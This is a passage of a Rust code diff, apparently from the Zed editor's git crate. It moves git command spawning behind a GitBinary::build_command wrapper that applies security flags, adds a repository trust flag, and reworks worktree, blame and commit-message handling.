https://github.com/serde-rs/json/issues/160#issuecomment-253446892, Use `serde_json_lenient::from_slice` instead." }, + { path = "cocoa::foundation::NSString::alloc", reason = "NSString must be autoreleased to avoid memory leaks. Use `ns_string()` helper instead." }, + { path = "smol::process::Command::new", reason = "Git commands must go through `GitBinary::build_command` to ensure security flags like `-c core.fsmonitor=false` are always applied.", replacement = "GitBinary::build_command" }, + { path = "util::command::new_command", reason = "Git commands must go through `GitBinary::build_command` to ensure security flags like `-c core.fsmonitor=false` are always applied.", replacement = "GitBinary::build_command" }, + { path = "util::command::Command::new", reason = "Git commands must go through `GitBinary::build_command` to ensure security flags like `-c core.fsmonitor=false` are always applied.", replacement = "GitBinary::build_command" }, +] +disallowed-types = [ + # { path = "std::collections::HashMap", replacement = "collections::HashMap" }, + # { path = "std::collections::HashSet", replacement = "collections::HashSet" }, + # { path = "indexmap::IndexSet", replacement = "collections::IndexSet" }, + # { path = "indexmap::IndexMap", replacement = "collections::IndexMap" }, +] \ No newline at end of file diff --git a/crates/git/src/blame.rs b/crates/git/src/blame.rs index 9dc184bf2ac253c8bc24f6203f13d6654ac2b64b..76e622fd6d7ae490c2c869c5ed02f02a48b45cab 100644 --- a/crates/git/src/blame.rs +++ b/crates/git/src/blame.rs @@ -1,11 +1,11 @@ use crate::Oid; use crate::commit::get_messages; -use crate::repository::RepoPath; +use crate::repository::{GitBinary, RepoPath}; use anyhow::{Context as _, Result}; use collections::{HashMap, HashSet}; use futures::AsyncWriteExt; use serde::{Deserialize, Serialize}; -use std::{ops::Range, path::Path}; +use std::ops::Range; use text::{LineEnding, Rope}; use time::OffsetDateTime; use time::UtcOffset; @@ -21,15 +21,13 @@ pub struct Blame { } impl Blame { - pub async fn for_path( - git_binary: &Path, - working_directory: &Path, + pub(crate) async fn for_path( + git: &GitBinary, path: &RepoPath, content: &Rope, line_ending: LineEnding, ) -> Result { - let output = - run_git_blame(git_binary, working_directory, path, content, line_ending).await?; + let output = run_git_blame(git, path, content, line_ending).await?; let mut entries = parse_git_blame(&output)?; entries.sort_unstable_by(|a, b| a.range.start.cmp(&b.range.start)); @@ -40,7 +38,7 @@ impl Blame { } let shas = unique_shas.into_iter().collect::>(); - let messages = get_messages(working_directory, &shas) + let messages = get_messages(git, &shas) .await .context("failed to get commit messages")?; @@ -52,8 +50,7 @@ const GIT_BLAME_NO_COMMIT_ERROR: &str = "fatal: no such ref: HEAD"; const GIT_BLAME_NO_PATH: &str = "fatal: no such path"; async fn run_git_blame( - git_binary: &Path, - working_directory: &Path, + git: &GitBinary, path: &RepoPath, contents: &Rope, line_ending: LineEnding, @@ -61,12 +58,7 @@ async fn run_git_blame( let mut child = { let span = ztracing::debug_span!("spawning git-blame command", path = path.as_unix_str()); let _enter = span.enter(); - util::command::new_command(git_binary) - .current_dir(working_directory) - .arg("blame") - .arg("--incremental") - .arg("--contents") - .arg("-") + git.build_command(&["blame", "--incremental", "--contents", "-"]) .arg(path.as_unix_str()) .stdin(Stdio::piped()) .stdout(Stdio::piped()) diff --git a/crates/git/src/commit.rs b/crates/git/src/commit.rs index 3f3526afc4ba8fa146592684a6d3acfc44ce7e73..50b62fa506bc31c0f4e2b3bedefc46cef415143b 100644 --- a/crates/git/src/commit.rs +++ b/crates/git/src/commit.rs @@ -1,11 +1,11 @@ use crate::{ BuildCommitPermalinkParams, GitHostingProviderRegistry, GitRemote, Oid, parse_git_remote_url, - status::StatusCode, + repository::GitBinary, status::StatusCode, }; use anyhow::{Context as _, Result}; use collections::HashMap; use gpui::SharedString; -use std::{path::Path, sync::Arc}; +use std::sync::Arc; #[derive(Clone, Debug, Default)] pub struct ParsedCommitMessage { @@ -48,7 +48,7 @@ impl ParsedCommitMessage { } } -pub async fn get_messages(working_directory: &Path, shas: &[Oid]) -> Result> { +pub(crate) async fn get_messages(git: &GitBinary, shas: &[Oid]) -> Result> { if shas.is_empty() { return Ok(HashMap::default()); } @@ -63,12 +63,12 @@ pub async fn get_messages(working_directory: &Path, shas: &[Oid]) -> Result Result>()) } -async fn get_messages_impl(working_directory: &Path, shas: &[Oid]) -> Result> { +async fn get_messages_impl(git: &GitBinary, shas: &[Oid]) -> Result> { const MARKER: &str = ""; - let output = util::command::new_command("git") - .current_dir(working_directory) - .arg("show") + let output = git + .build_command(&["show"]) .arg("-s") .arg(format!("--format=%B{}", MARKER)) .args(shas.iter().map(ToString::to_string)) @@ -92,7 +91,7 @@ async fn get_messages_impl(working_directory: &Path, shas: &[Oid]) -> Result for Oid { + type Error = anyhow::Error; + + fn try_from(value: &str) -> std::prelude::v1::Result { + Oid::from_str(value) + } +} + impl FromStr for Oid { type Err = anyhow::Error; diff --git a/crates/git/src/repository.rs b/crates/git/src/repository.rs index 1c707e1183d501224b85d562d805e54e2a3286ae..504480cb25b1f3d69c8e482b069568d710f57c29 100644 --- a/crates/git/src/repository.rs +++ b/crates/git/src/repository.rs @@ -21,6 +21,7 @@ use text::LineEnding; use std::collections::HashSet; use std::ffi::{OsStr, OsString}; +use std::sync::atomic::AtomicBool; use std::process::ExitStatus; use std::str::FromStr; @@ -35,7 +36,7 @@ use thiserror::Error; use util::command::{Stdio, new_command}; use util::paths::PathStyle; use util::rel_path::RelPath; -use util::{ResultExt, normalize_path, paths}; +use util::{ResultExt, paths}; use uuid::Uuid; pub use askpass::{AskPassDelegate, AskPassResult, AskPassSession}; @@ -49,101 +50,53 @@ pub const REMOTE_CANCELLED_BY_USER: &str = "Operation cancelled by user"; /// %x00 - Null byte separator, used to split up commit data static GRAPH_COMMIT_FORMAT: &str = "--format=%H%x00%P%x00%D"; +/// Used to get commits that match with a search +/// %H - Full commit hash +static SEARCH_COMMIT_FORMAT: &str = "--format=%H"; + /// Number of commits to load per chunk for the git graph. pub const GRAPH_CHUNK_SIZE: usize = 1000; /// Default value for the `git.worktree_directory` setting. pub const DEFAULT_WORKTREE_DIRECTORY: &str = "../worktrees"; -/// Resolves the configured worktree directory to an absolute path. -/// -/// `worktree_directory_setting` is the raw string from the user setting -/// (e.g. `"../worktrees"`, `".git/zed-worktrees"`, `"my-worktrees/"`). -/// Trailing slashes are stripped. The path is resolved relative to -/// `working_directory` (the repository's working directory root). -/// -/// When the resolved directory falls outside the working directory -/// (e.g. `"../worktrees"`), the repository's directory name is -/// automatically appended so that sibling repos don't collide. -/// For example, with working directory `~/code/zed` and setting -/// `"../worktrees"`, this returns `~/code/worktrees/zed`. +/// Determine the original (main) repository's working directory. /// -/// When the resolved directory is inside the working directory -/// (e.g. `".git/zed-worktrees"`), no extra component is added -/// because the path is already project-scoped. -pub fn resolve_worktree_directory( - working_directory: &Path, - worktree_directory_setting: &str, +/// For linked worktrees, `common_dir` differs from `repository_dir` and +/// points to the main repo's `.git` directory, so we can derive the main +/// repo's working directory from it. For normal repos and submodules, +/// `common_dir` equals `repository_dir`, and the original repo is simply +/// `work_directory` itself. +pub fn original_repo_path( + work_directory: &Path, + common_dir: &Path, + repository_dir: &Path, ) -> PathBuf { - let trimmed = worktree_directory_setting.trim_end_matches(['/', '\\']); - let joined = working_directory.join(trimmed); - let resolved = normalize_path(&joined); - - if resolved.starts_with(working_directory) { - resolved - } else if let Some(repo_dir_name) = working_directory.file_name() { - resolved.join(repo_dir_name) + if common_dir != repository_dir { + original_repo_path_from_common_dir(common_dir) } else { - resolved + work_directory.to_path_buf() } } -/// Validates that the resolved worktree directory is acceptable: -/// - The setting must not be an absolute path. -/// - The resolved path must be either a subdirectory of the working -/// directory or a subdirectory of its parent (i.e., a sibling). +/// Given the git common directory (from `commondir()`), derive the original +/// repository's working directory. /// -/// Returns `Ok(resolved_path)` or an error with a user-facing message. -pub fn validate_worktree_directory( - working_directory: &Path, - worktree_directory_setting: &str, -) -> Result { - // Check the original setting before trimming, since a path like "///" - // is absolute but becomes "" after stripping trailing separators. - // Also check for leading `/` or `\` explicitly, because on Windows - // `Path::is_absolute()` requires a drive letter — so `/tmp/worktrees` - // would slip through even though it's clearly not a relative path. - if Path::new(worktree_directory_setting).is_absolute() - || worktree_directory_setting.starts_with('/') - || worktree_directory_setting.starts_with('\\') - { - anyhow::bail!( - "git.worktree_directory must be a relative path, got: {worktree_directory_setting:?}" - ); - } - - if worktree_directory_setting.is_empty() { - anyhow::bail!("git.worktree_directory must not be empty"); - } - - let trimmed = worktree_directory_setting.trim_end_matches(['/', '\\']); - if trimmed == ".." { - anyhow::bail!("git.worktree_directory must not be \"..\" (use \"../some-name\" instead)"); - } - - let resolved = resolve_worktree_directory(working_directory, worktree_directory_setting); - - let parent = working_directory.parent().unwrap_or(working_directory); - - if !resolved.starts_with(parent) { - anyhow::bail!( - "git.worktree_directory resolved to {resolved:?}, which is outside \ - the project root and its parent directory. It must resolve to a \ - subdirectory of {working_directory:?} or a sibling of it." - ); +/// For a standard checkout, `common_dir` is `/.git`, so the parent +/// is the working directory. For a git worktree, `common_dir` is the **main** +/// repo's `.git` directory, so the parent is the original repo's working directory. +/// +/// Falls back to returning `common_dir` itself if it doesn't end with `.git` +/// (e.g. bare repos or unusual layouts). +pub fn original_repo_path_from_common_dir(common_dir: &Path) -> PathBuf { + if common_dir.file_name() == Some(OsStr::new(".git")) { + common_dir + .parent() + .map(|p| p.to_path_buf()) + .unwrap_or_else(|| common_dir.to_path_buf()) + } else { + common_dir.to_path_buf() } - - Ok(resolved) -} - -/// Returns the full absolute path for a specific branch's worktree -/// given the resolved worktree directory. -pub fn worktree_path_for_branch( - working_directory: &Path, - worktree_directory_setting: &str, - branch: &str, -) -> PathBuf { - resolve_worktree_directory(working_directory, worktree_directory_setting).join(branch) } /// Commit data needed for the git graph visualization. @@ -282,22 +235,32 @@ impl Branch { #[derive(Clone, Debug, Hash, PartialEq, Eq)] pub struct Worktree { pub path: PathBuf, - pub ref_name: SharedString, + pub ref_name: Option, + // todo(git_worktree) This type should be a Oid pub sha: SharedString, + pub is_main: bool, } impl Worktree { - pub fn branch(&self) -> &str { - self.ref_name - .as_ref() - .strip_prefix("refs/heads/") - .or_else(|| self.ref_name.as_ref().strip_prefix("refs/remotes/")) - .unwrap_or(self.ref_name.as_ref()) + /// Returns a display name for the worktree, suitable for use in the UI. + /// + /// If the worktree is attached to a branch, returns the branch name. + /// Otherwise, returns the short SHA of the worktree's HEAD commit. + pub fn display_name(&self) -> &str { + match self.ref_name { + Some(ref ref_name) => ref_name + .strip_prefix("refs/heads/") + .or_else(|| ref_name.strip_prefix("refs/remotes/")) + .unwrap_or(ref_name), + // Detached HEAD — show the short SHA as a fallback. + None => &self.sha[..self.sha.len().min(SHORT_SHA_LENGTH)], + } } } pub fn parse_worktrees_from_str>(raw_worktrees: T) -> Vec { let mut worktrees = Vec::new(); + let mut is_first = true; let normalized = raw_worktrees.as_ref().replace("\r\n", "\n"); let entries = normalized.split("\n\n"); for entry in entries { @@ -320,12 +283,14 @@ pub fn parse_worktrees_from_str>(raw_worktrees: T) -> Vec BoxFuture<'_, Result<()>>; fn rename_branch(&self, branch: String, new_name: String) -> BoxFuture<'_, Result<()>>; - fn delete_branch(&self, name: String) -> BoxFuture<'_, Result<()>>; + fn delete_branch(&self, is_remote: bool, name: String) -> BoxFuture<'_, Result<()>>; fn worktrees(&self) -> BoxFuture<'_, Result>>; fn create_worktree( &self, - name: String, - directory: PathBuf, + branch_name: Option, + path: PathBuf, from_commit: Option, ) -> BoxFuture<'_, Result<()>>; @@ -903,8 +874,8 @@ pub trait GitRepository: Send + Sync { fn diff_stat( &self, - diff: DiffType, - ) -> BoxFuture<'_, Result>>; + path_prefixes: &[RepoPath], + ) -> BoxFuture<'_, Result>; /// Creates a checkpoint for the repository. fn checkpoint(&self) -> BoxFuture<'static, Result>; @@ -940,7 +911,23 @@ pub trait GitRepository: Send + Sync { request_tx: Sender>>, ) -> BoxFuture<'_, Result<()>>; + fn search_commits( + &self, + log_source: LogSource, + search_args: SearchCommitArgs, + request_tx: Sender, + ) -> BoxFuture<'_, Result<()>>; + fn commit_data_reader(&self) -> Result; + + fn update_ref(&self, ref_name: String, commit: String) -> BoxFuture<'_, Result<()>>; + + fn delete_ref(&self, ref_name: String) -> BoxFuture<'_, Result<()>>; + + fn repair_worktrees(&self) -> BoxFuture<'_, Result<()>>; + + fn set_trusted(&self, trusted: bool); + fn is_trusted(&self) -> bool; } pub enum DiffType { @@ -967,6 +954,7 @@ pub struct RealGitRepository { pub any_git_binary_path: PathBuf, any_git_binary_help_output: Arc>>, executor: BackgroundExecutor, + is_trusted: Arc, } impl RealGitRepository { @@ -975,16 +963,24 @@ impl RealGitRepository { bundled_git_binary_path: Option, system_git_binary_path: Option, executor: BackgroundExecutor, - ) -> Option { - let any_git_binary_path = system_git_binary_path.clone().or(bundled_git_binary_path)?; - let workdir_root = dotgit_path.parent()?; - let repository = git2::Repository::open(workdir_root).log_err()?; - Some(Self { + ) -> Result { + let any_git_binary_path = system_git_binary_path + .clone() + .or(bundled_git_binary_path) + .context("no git binary available")?; + log::info!( + "opening git repository at {dotgit_path:?} using git binary {any_git_binary_path:?}" + ); + let workdir_root = dotgit_path.parent().context(".git has no parent")?; + let repository = + git2::Repository::open(workdir_root).context("creating libgit2 repository")?; + Ok(Self { repository: Arc::new(Mutex::new(repository)), system_git_binary_path, any_git_binary_path, executor, any_git_binary_help_output: Arc::new(Mutex::new(None)), + is_trusted: Arc::new(AtomicBool::new(false)), }) } @@ -996,20 +992,25 @@ impl RealGitRepository { .map(Path::to_path_buf) } + fn git_binary(&self) -> Result { + Ok(GitBinary::new( + self.any_git_binary_path.clone(), + self.working_directory() + .with_context(|| "Can't run git commands without a working directory")?, + self.path(), + self.executor.clone(), + self.is_trusted(), + )) + } + async fn any_git_binary_help_output(&self) -> SharedString { if let Some(output) = self.any_git_binary_help_output.lock().clone() { return output; } - let git_binary_path = self.any_git_binary_path.clone(); - let executor = self.executor.clone(); - let working_directory = self.working_directory(); + let git_binary = self.git_binary(); let output: SharedString = self .executor - .spawn(async move { - GitBinary::new(git_binary_path, working_directory?, executor) - .run(["help", "-a"]) - .await - }) + .spawn(async move { git_binary?.run(&["help", "-a"]).await }) .await .unwrap_or_default() .into(); @@ -1051,13 +1052,18 @@ pub async fn get_git_committer(cx: &AsyncApp) -> GitCommitter { let git = GitBinary::new( git_binary_path.unwrap_or(PathBuf::from("git")), paths::home_dir().clone(), + paths::home_dir().join(".git"), cx.background_executor().clone(), + true, ); cx.background_spawn(async move { - let name = git.run(["config", "--global", "user.name"]).await.log_err(); + let name = git + .run(&["config", "--global", "user.name"]) + .await + .log_err(); let email = git - .run(["config", "--global", "user.email"]) + .run(&["config", "--global", "user.email"]) .await .log_err(); GitCommitter { name, email } @@ -1083,15 +1089,12 @@ impl GitRepository for RealGitRepository { } fn show(&self, commit: String) -> BoxFuture<'_, Result> { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = self.working_directory(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; - let output = new_command(git_binary_path) - .current_dir(&working_directory) - .args([ - "--no-optional-locks", + let git = git_binary?; + let output = git + .build_command(&[ "show", "--no-patch", "--format=%H%x00%B%x00%at%x00%ae%x00%an%x00", @@ -1121,16 +1124,14 @@ impl GitRepository for RealGitRepository { } fn load_commit(&self, commit: String, cx: AsyncApp) -> BoxFuture<'_, Result> { - let Some(working_directory) = self.repository.lock().workdir().map(ToOwned::to_owned) - else { + if self.repository.lock().workdir().is_none() { return future::ready(Err(anyhow!("no working directory"))).boxed(); - }; - let git_binary_path = self.any_git_binary_path.clone(); + } + let git_binary = self.git_binary(); cx.background_spawn(async move { - let show_output = util::command::new_command(&git_binary_path) - .current_dir(&working_directory) - .args([ - "--no-optional-locks", + let git = git_binary?; + let show_output = git + .build_command(&[ "show", "--format=", "-z", @@ -1150,9 +1151,8 @@ impl GitRepository for RealGitRepository { let changes = parse_git_diff_name_status(&show_stdout); let parent_sha = format!("{}^", commit); - let mut cat_file_process = util::command::new_command(&git_binary_path) - .current_dir(&working_directory) - .args(["--no-optional-locks", "cat-file", "--batch=%(objectsize)"]) + let mut cat_file_process = git + .build_command(&["cat-file", "--batch=%(objectsize)"]) .stdin(Stdio::piped()) .stdout(Stdio::piped()) .stderr(Stdio::piped()) @@ -1259,18 +1259,17 @@ impl GitRepository for RealGitRepository { mode: ResetMode, env: Arc>, ) -> BoxFuture<'_, Result<()>> { + let git_binary = self.git_binary(); async move { - let working_directory = self.working_directory(); - let mode_flag = match mode { ResetMode::Mixed => "--mixed", ResetMode::Soft => "--soft", }; - let output = new_command(&self.any_git_binary_path) + let git = git_binary?; + let output = git + .build_command(&["reset", mode_flag, &commit]) .envs(env.iter()) - .current_dir(&working_directory?) - .args(["reset", mode_flag, &commit]) .output() .await?; anyhow::ensure!( @@ -1289,17 +1288,16 @@ impl GitRepository for RealGitRepository { paths: Vec, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); async move { if paths.is_empty() { return Ok(()); } - let output = new_command(&git_binary_path) - .current_dir(&working_directory?) + let git = git_binary?; + let output = git + .build_command(&["checkout", &commit, "--"]) .envs(env.iter()) - .args(["checkout", &commit, "--"]) .args(paths.iter().map(|path| path.as_unix_str())) .output() .await?; @@ -1321,33 +1319,29 @@ impl GitRepository for RealGitRepository { self.executor .spawn(async move { fn logic(repo: &git2::Repository, path: &RepoPath) -> Result> { - // This check is required because index.get_path() unwraps internally :( let mut index = repo.index()?; index.read(false)?; const STAGE_NORMAL: i32 = 0; - let path = path.as_std_path(); - // `RepoPath` contains a `RelPath` which normalizes `.` into an empty path - // `get_path` unwraps on empty paths though, so undo that normalization here - let path = if path.components().next().is_none() { - ".".as_ref() - } else { - path - }; - let oid = match index.get_path(path, STAGE_NORMAL) { - Some(entry) if entry.mode != GIT_MODE_SYMLINK => entry.id, - _ => return Ok(None), + // git2 unwraps internally on empty paths or `.` + if path.is_empty() { + bail!("empty path has no index text"); + } + let Some(entry) = index.get_path(path.as_std_path(), STAGE_NORMAL) else { + return Ok(None); }; + if entry.mode == GIT_MODE_SYMLINK { + return Ok(None); + } - let content = repo.find_blob(oid)?.content().to_owned(); + let content = repo.find_blob(entry.id)?.content().to_owned(); Ok(String::from_utf8(content).ok()) } - match logic(&repo.lock(), &path) { - Ok(value) => return value, - Err(err) => log::error!("Error loading index text: {:?}", err), - } - None + logic(&repo.lock(), &path) + .context("loading index text") + .log_err() + .flatten() }) .boxed() } @@ -1356,14 +1350,26 @@ impl GitRepository for RealGitRepository { let repo = self.repository.clone(); self.executor .spawn(async move { - let repo = repo.lock(); - let head = repo.head().ok()?.peel_to_tree().log_err()?; - let entry = head.get_path(path.as_std_path()).ok()?; - if entry.filemode() == i32::from(git2::FileMode::Link) { - return None; + fn logic(repo: &git2::Repository, path: &RepoPath) -> Result> { + let head = repo.head()?.peel_to_tree()?; + // git2 unwraps internally on empty paths or `.` + if path.is_empty() { + return Err(anyhow!("empty path has no committed text")); + } + let Some(entry) = head.get_path(path.as_std_path()).ok() else { + return Ok(None); + }; + if entry.filemode() == i32::from(git2::FileMode::Link) { + return Ok(None); + } + let content = repo.find_blob(entry.id())?.content().to_owned(); + Ok(String::from_utf8(content).ok()) } - let content = repo.find_blob(entry.id()).log_err()?.content().to_owned(); - String::from_utf8(content).ok() + + logic(&repo.lock(), &path) + .context("loading committed text") + .log_err() + .flatten() }) .boxed() } @@ -1386,18 +1392,16 @@ impl GitRepository for RealGitRepository { env: Arc>, is_executable: bool, ) -> BoxFuture<'_, anyhow::Result<()>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; + let git = git_binary?; let mode = if is_executable { "100755" } else { "100644" }; if let Some(content) = content { - let mut child = new_command(&git_binary_path) - .current_dir(&working_directory) + let mut child = git + .build_command(&["hash-object", "-w", "--stdin"]) .envs(env.iter()) - .args(["hash-object", "-w", "--stdin"]) .stdin(Stdio::piped()) .stdout(Stdio::piped()) .spawn()?; @@ -1410,10 +1414,9 @@ impl GitRepository for RealGitRepository { log::debug!("indexing SHA: {sha}, path {path:?}"); - let output = new_command(&git_binary_path) - .current_dir(&working_directory) + let output = git + .build_command(&["update-index", "--add", "--cacheinfo", mode, sha]) .envs(env.iter()) - .args(["update-index", "--add", "--cacheinfo", mode, sha]) .arg(path.as_unix_str()) .output() .await?; @@ -1425,10 +1428,9 @@ impl GitRepository for RealGitRepository { ); } else { log::debug!("removing path {path:?} from the index"); - let output = new_command(&git_binary_path) - .current_dir(&working_directory) + let output = git + .build_command(&["update-index", "--force-remove"]) .envs(env.iter()) - .args(["update-index", "--force-remove"]) .arg(path.as_unix_str()) .output() .await?; @@ -1457,18 +1459,12 @@ impl GitRepository for RealGitRepository { } fn revparse_batch(&self, revs: Vec) -> BoxFuture<'_, Result>>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; - let mut process = new_command(&git_binary_path) - .current_dir(&working_directory) - .args([ - "--no-optional-locks", - "cat-file", - "--batch-check=%(objectname)", - ]) + let git = git_binary?; + let mut process = git + .build_command(&["cat-file", "--batch-check=%(objectname)"]) .stdin(Stdio::piped()) .stdout(Stdio::piped()) .stderr(Stdio::piped()) @@ -1517,19 +1513,14 @@ impl GitRepository for RealGitRepository { } fn status(&self, path_prefixes: &[RepoPath]) -> Task> { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = match self.working_directory() { - Ok(working_directory) => working_directory, + let git = match self.git_binary() { + Ok(git) => git, Err(e) => return Task::ready(Err(e)), }; let args = git_status_args(path_prefixes); log::debug!("Checking for git status in {path_prefixes:?}"); self.executor.spawn(async move { - let output = new_command(&git_binary_path) - .current_dir(working_directory) - .args(args) - .output() - .await?; + let output = git.build_command(&args).output().await?; if output.status.success() { let stdout = String::from_utf8_lossy(&output.stdout); stdout.parse() @@ -1541,14 +1532,12 @@ impl GitRepository for RealGitRepository { } fn diff_tree(&self, request: DiffTreeType) -> BoxFuture<'_, Result> { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = match self.working_directory() { - Ok(working_directory) => working_directory, + let git = match self.git_binary() { + Ok(git) => git, Err(e) => return Task::ready(Err(e)).boxed(), }; let mut args = vec![ - OsString::from("--no-optional-locks"), OsString::from("diff-tree"), OsString::from("-r"), OsString::from("-z"), @@ -1568,11 +1557,7 @@ impl GitRepository for RealGitRepository { self.executor .spawn(async move { - let output = new_command(&git_binary_path) - .current_dir(working_directory) - .args(args) - .output() - .await?; + let output = git.build_command(&args).output().await?; if output.status.success() { let stdout = String::from_utf8_lossy(&output.stdout); stdout.parse() @@ -1585,13 +1570,12 @@ impl GitRepository for RealGitRepository { } fn stash_entries(&self) -> BoxFuture<'_, Result> { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = self.working_directory(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let output = new_command(&git_binary_path) - .current_dir(working_directory?) - .args(&["stash", "list", "--pretty=format:%gd%x00%H%x00%ct%x00%s"]) + let git = git_binary?; + let output = git + .build_command(&["stash", "list", "--pretty=format:%gd%x00%H%x00%ct%x00%s"]) .output() .await?; if output.status.success() { @@ -1606,8 +1590,7 @@ impl GitRepository for RealGitRepository { } fn branches(&self) -> BoxFuture<'_, Result>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { let fields = [ @@ -1629,12 +1612,8 @@ impl GitRepository for RealGitRepository { "--format", &fields, ]; - let working_directory = working_directory?; - let output = new_command(&git_binary_path) - .current_dir(&working_directory) - .args(args) - .output() - .await?; + let git = git_binary?; + let output = git.build_command(&args).output().await?; anyhow::ensure!( output.status.success(), @@ -1648,11 +1627,7 @@ impl GitRepository for RealGitRepository { if branches.is_empty() { let args = vec!["symbolic-ref", "--quiet", "HEAD"]; - let output = new_command(&git_binary_path) - .current_dir(&working_directory) - .args(args) - .output() - .await?; + let output = git.build_command(&args).output().await?; // git symbolic-ref returns a non-0 exit code if HEAD points // to something other than a branch @@ -1674,13 +1649,12 @@ impl GitRepository for RealGitRepository { } fn worktrees(&self) -> BoxFuture<'_, Result>> { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = self.working_directory(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let output = new_command(&git_binary_path) - .current_dir(working_directory?) - .args(&["--no-optional-locks", "worktree", "list", "--porcelain"]) + let git = git_binary?; + let output = git + .build_command(&["worktree", "list", "--porcelain"]) .output() .await?; if output.status.success() { @@ -1696,22 +1670,20 @@ impl GitRepository for RealGitRepository { fn create_worktree( &self, - name: String, - directory: PathBuf, + branch_name: Option, + path: PathBuf, from_commit: Option, ) -> BoxFuture<'_, Result<()>> { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = self.working_directory(); - let final_path = directory.join(&name); - let mut args = vec![ - OsString::from("--no-optional-locks"), - OsString::from("worktree"), - OsString::from("add"), - OsString::from("-b"), - OsString::from(name.as_str()), - OsString::from("--"), - OsString::from(final_path.as_os_str()), - ]; + let git_binary = self.git_binary(); + let mut args = vec![OsString::from("worktree"), OsString::from("add")]; + if let Some(branch_name) = &branch_name { + args.push(OsString::from("-b")); + args.push(OsString::from(branch_name.as_str())); + } else { + args.push(OsString::from("--detach")); + } + args.push(OsString::from("--")); + args.push(OsString::from(path.as_os_str())); if let Some(from_commit) = from_commit { args.push(OsString::from(from_commit)); } else { @@ -1720,12 +1692,9 @@ impl GitRepository for RealGitRepository { self.executor .spawn(async move { - std::fs::create_dir_all(final_path.parent().unwrap_or(&final_path))?; - let output = new_command(&git_binary_path) - .current_dir(working_directory?) - .args(args) - .output() - .await?; + std::fs::create_dir_all(path.parent().unwrap_or(&path))?; + let git = git_binary?; + let output = git.build_command(&args).output().await?; if output.status.success() { Ok(()) } else { @@ -1737,48 +1706,35 @@ impl GitRepository for RealGitRepository { } fn remove_worktree(&self, path: PathBuf, force: bool) -> BoxFuture<'_, Result<()>> { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = self.working_directory(); - let executor = self.executor.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let mut args: Vec = vec![ - "--no-optional-locks".into(), - "worktree".into(), - "remove".into(), - ]; + let mut args: Vec = vec!["worktree".into(), "remove".into()]; if force { args.push("--force".into()); } args.push("--".into()); args.push(path.as_os_str().into()); - GitBinary::new(git_binary_path, working_directory?, executor) - .run(args) - .await?; + git_binary?.run(&args).await?; anyhow::Ok(()) }) .boxed() } fn rename_worktree(&self, old_path: PathBuf, new_path: PathBuf) -> BoxFuture<'_, Result<()>> { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = self.working_directory(); - let executor = self.executor.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { let args: Vec = vec![ - "--no-optional-locks".into(), "worktree".into(), "move".into(), "--".into(), old_path.as_os_str().into(), new_path.as_os_str().into(), ]; - GitBinary::new(git_binary_path, working_directory?, executor) - .run(args) - .await?; + git_binary?.run(&args).await?; anyhow::Ok(()) }) .boxed() @@ -1786,9 +1742,7 @@ impl GitRepository for RealGitRepository { fn change_branch(&self, name: String) -> BoxFuture<'_, Result<()>> { let repo = self.repository.clone(); - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); - let executor = self.executor.clone(); + let git_binary = self.git_binary(); let branch = self.executor.spawn(async move { let repo = repo.lock(); let branch = if let Ok(branch) = repo.find_branch(&name, BranchType::Local) { @@ -1823,9 +1777,7 @@ impl GitRepository for RealGitRepository { self.executor .spawn(async move { let branch = branch.await?; - GitBinary::new(git_binary_path, working_directory?, executor) - .run(&["checkout", &branch]) - .await?; + git_binary?.run(&["checkout", &branch]).await?; anyhow::Ok(()) }) .boxed() @@ -1836,9 +1788,7 @@ impl GitRepository for RealGitRepository { name: String, base_branch: Option, ) -> BoxFuture<'_, Result<()>> { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = self.working_directory(); - let executor = self.executor.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { @@ -1849,22 +1799,18 @@ impl GitRepository for RealGitRepository { args.push(&base_branch_str); } - GitBinary::new(git_binary_path, working_directory?, executor) - .run(&args) - .await?; + git_binary?.run(&args).await?; anyhow::Ok(()) }) .boxed() } fn rename_branch(&self, branch: String, new_name: String) -> BoxFuture<'_, Result<()>> { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = self.working_directory(); - let executor = self.executor.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - GitBinary::new(git_binary_path, working_directory?, executor) + git_binary? .run(&["branch", "-m", &branch, &new_name]) .await?; anyhow::Ok(()) @@ -1872,15 +1818,13 @@ impl GitRepository for RealGitRepository { .boxed() } - fn delete_branch(&self, name: String) -> BoxFuture<'_, Result<()>> { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = self.working_directory(); - let executor = self.executor.clone(); + fn delete_branch(&self, is_remote: bool, name: String) -> BoxFuture<'_, Result<()>> { + let git_binary = self.git_binary(); self.executor .spawn(async move { - GitBinary::new(git_binary_path, working_directory?, executor) - .run(&["branch", "-d", &name]) + git_binary? + .run(&["branch", if is_remote { "-dr" } else { "-d" }, &name]) .await?; anyhow::Ok(()) }) @@ -1893,20 +1837,11 @@ impl GitRepository for RealGitRepository { content: Rope, line_ending: LineEnding, ) -> BoxFuture<'_, Result> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); - let executor = self.executor.clone(); + let git = self.git_binary(); - executor + self.executor .spawn(async move { - crate::blame::Blame::for_path( - &git_binary_path, - 